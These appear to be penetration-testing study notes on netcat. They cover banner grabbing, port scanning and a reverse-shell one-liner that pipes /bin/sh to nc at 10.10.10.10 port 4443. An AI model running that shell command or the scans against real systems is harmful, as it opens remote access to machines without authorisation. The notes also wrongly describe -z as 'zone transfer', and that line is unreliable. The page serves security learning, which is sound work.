# Netcat

* TCP/IP Swiss Army Knife - we will use this tool alot
* Can scan ports but can also be used for:
  * chatting between two computers
  * banner grabbing
  * file transfer
  * for shell
* Traffic is not encrypted ( unless you use **ncat**)

## Banner Grabbing

```
nc -v google.com 80
```

it will connect nc to google server if port 80 is open and then we can query it manually for example

![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MkmHETOG-_mdJ5bh837%2F-MkmHXqYrcINKpcJd7AD%2Fimage.png?alt=media\&token=2d18ca29-5017-4a38-a39f-11cb1ef36e88)

after connecting , we can use http parameters like **GET, HEAD, OPTIONS etc** to send the request and server will return the response

## Netcat without -e flag

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
```

## Port Scanning

```
 nc -nv -w 1 -z 192.168.1.1 1-1024
 
-nv = doesn't resolve dns
-w 1 = sets timeout to 1 second
-z = specifies zone transfer
-u = UDP mode (can be unreliable)
```